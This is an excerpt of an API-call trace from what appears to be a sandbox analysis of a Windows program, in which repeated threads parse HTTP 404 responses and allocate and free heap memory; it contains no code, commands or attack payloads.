1 Thread: id = 507 os_tid = 0xc70 [0305.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.812] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.812] GetProcessHeap () returned 0x690000 [0305.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0305.812] GetProcessHeap () returned 0x690000 [0305.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0305.812] GetProcessHeap () returned 0x690000 [0305.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 508 os_tid = 0x134c [0305.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.996] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.996] GetProcessHeap () returned 0x690000 [0305.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0305.996] GetProcessHeap () returned 0x690000 [0305.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0305.996] GetProcessHeap () returned 0x690000 [0305.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 509 os_tid = 0x177c [0306.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.167] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.167] GetProcessHeap () returned 0x690000 [0306.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0306.167] GetProcessHeap () returned 0x690000 [0306.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0306.167] GetProcessHeap () returned 0x690000 [0306.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 510 os_tid = 0x1784 [0306.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.434] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.435] GetProcessHeap () returned 0x690000 [0306.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0306.435] GetProcessHeap () returned 0x690000 [0306.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0306.435] GetProcessHeap () returned 0x690000 [0306.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 511 os_tid = 0x1790 [0306.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.679] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:51 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.679] GetProcessHeap () returned 0x690000 [0306.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0306.679] GetProcessHeap () returned 0x690000 [0306.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0306.679] GetProcessHeap () returned 0x690000 [0306.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 512 os_tid = 0x1778 [0307.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.136] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.136] GetProcessHeap () returned 0x690000 [0307.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0307.136] GetProcessHeap () returned 0x690000 [0307.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0307.136] GetProcessHeap () returned 0x690000 [0307.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 513 os_tid = 0xe0c [0307.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.298] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.298] GetProcessHeap () returned 0x690000 [0307.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0307.298] GetProcessHeap () returned 0x690000 [0307.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0307.298] GetProcessHeap () returned 0x690000 [0307.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 514 os_tid = 0x1504 [0307.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.469] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.469] GetProcessHeap () returned 0x690000 [0307.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0307.469] GetProcessHeap () returned 0x690000 [0307.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0307.469] GetProcessHeap () returned 0x690000 [0307.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 515 os_tid = 0xdec [0307.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.741] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:52 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.741] GetProcessHeap () returned 0x690000 [0307.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0307.741] GetProcessHeap () returned 0x690000 [0307.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0307.741] GetProcessHeap () returned 0x690000 [0307.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 516 os_tid = 0x17dc [0307.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.884] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:53 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.884] GetProcessHeap () returned 0x690000 [0307.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0307.884] GetProcessHeap () returned 0x690000 [0307.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0307.884] GetProcessHeap () returned 0x690000 [0307.885] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 517 os_tid = 0x714 [0309.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.030] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.031] GetProcessHeap () returned 0x690000 [0309.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0309.031] GetProcessHeap () returned 0x690000 [0309.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0309.031] GetProcessHeap () returned 0x690000 [0309.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 518 os_tid = 0x708 [0309.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.239] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.239] GetProcessHeap () returned 0x690000 [0309.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0309.239] GetProcessHeap () returned 0x690000 [0309.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0309.239] GetProcessHeap () returned 0x690000 [0309.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 519 os_tid = 0xd38 [0309.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.406] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.406] GetProcessHeap () returned 0x690000 [0309.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0309.406] GetProcessHeap () returned 0x690000 [0309.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0309.406] GetProcessHeap () returned 0x690000 [0309.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 520 os_tid = 0xf30 [0309.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.598] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:54 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.598] GetProcessHeap () returned 0x690000 [0309.598] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0309.598] GetProcessHeap () returned 0x690000 [0309.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0309.599] GetProcessHeap () returned 0x690000 [0309.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 521 os_tid = 0xf38 [0309.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.785] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.785] GetProcessHeap () returned 0x690000 [0309.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0309.785] GetProcessHeap () returned 0x690000 [0309.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0309.785] GetProcessHeap () returned 0x690000 [0309.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 522 os_tid = 0x17e0 [0309.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.950] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.950] GetProcessHeap () returned 0x690000 [0309.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0309.950] GetProcessHeap () returned 0x690000 [0309.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0309.950] GetProcessHeap () returned 0x690000 [0309.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 523 os_tid = 0xf2c [0310.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.145] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.145] GetProcessHeap () returned 0x690000 [0310.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0310.145] GetProcessHeap () returned 0x690000 [0310.145] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0310.145] GetProcessHeap () returned 0x690000 [0310.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 524 os_tid = 0x151c [0310.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.341] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.341] GetProcessHeap () returned 0x690000 [0310.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0310.341] GetProcessHeap () returned 0x690000 [0310.341] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0310.341] GetProcessHeap () returned 0x690000 [0310.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 525 os_tid = 0x16a4 [0310.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.477] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.477] GetProcessHeap () returned 0x690000 [0310.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0310.478] GetProcessHeap () returned 0x690000 [0310.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0310.478] GetProcessHeap () returned 0x690000 [0310.478] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 526 os_tid = 0x1694 [0310.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.872] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:55 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.873] GetProcessHeap () returned 0x690000 [0310.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0310.873] GetProcessHeap () returned 0x690000 [0310.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0310.873] GetProcessHeap () returned 0x690000 [0310.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 527 os_tid = 0x16b0 [0311.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.077] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.077] GetProcessHeap () returned 0x690000 [0311.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0311.077] GetProcessHeap () returned 0x690000 [0311.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0311.077] GetProcessHeap () returned 0x690000 [0311.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 528 os_tid = 0x16cc [0311.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.275] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.280] GetProcessHeap () returned 0x690000 [0311.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0311.280] GetProcessHeap () returned 0x690000 [0311.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0311.280] GetProcessHeap () returned 0x690000 [0311.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 529 os_tid = 0x16e4 [0311.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.426] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.426] GetProcessHeap () returned 0x690000 [0311.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0311.426] GetProcessHeap () returned 0x690000 [0311.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0311.426] GetProcessHeap () returned 0x690000 [0311.426] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 530 os_tid = 0x1698 [0311.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.587] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:56 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.587] GetProcessHeap () returned 0x690000 [0311.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0311.587] GetProcessHeap () returned 0x690000 [0311.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0311.587] GetProcessHeap () returned 0x690000 [0311.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 531 os_tid = 0x170c [0311.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.815] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.815] GetProcessHeap () returned 0x690000 [0311.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0311.815] GetProcessHeap () returned 0x690000 [0311.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0311.815] GetProcessHeap () returned 0x690000 [0311.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 532 os_tid = 0x16a0 [0311.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.956] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.956] GetProcessHeap () returned 0x690000 [0311.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0311.956] GetProcessHeap () returned 0x690000 [0311.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0311.956] GetProcessHeap () returned 0x690000 [0311.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 533 os_tid = 0x17c0 [0312.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.151] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.151] GetProcessHeap () returned 0x690000 [0312.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0312.152] GetProcessHeap () returned 0x690000 [0312.152] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0312.152] GetProcessHeap () returned 0x690000 [0312.152] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 534 os_tid = 0x1714 [0312.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.295] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.295] GetProcessHeap () returned 0x690000 [0312.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0312.295] GetProcessHeap () returned 0x690000 [0312.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0312.295] GetProcessHeap () returned 0x690000 [0312.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 535 os_tid = 0x16b4 [0312.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.670] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:57 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.670] GetProcessHeap () returned 0x690000 [0312.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0312.670] GetProcessHeap () returned 0x690000 [0312.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0312.670] GetProcessHeap () returned 0x690000 [0312.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 536 os_tid = 0x168c [0312.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0312.873] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.873] GetProcessHeap () returned 0x690000 [0312.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0312.873] GetProcessHeap () returned 0x690000 [0312.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0312.873] GetProcessHeap () returned 0x690000 [0312.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 537 os_tid = 0x1688 [0313.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0313.053] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:45:58 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.053] GetProcessHeap () returned 0x690000 [0313.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0313.053] GetProcessHeap () returned 0x690000 [0313.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0313.053] GetProcessHeap () returned 0x690000 [0313.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 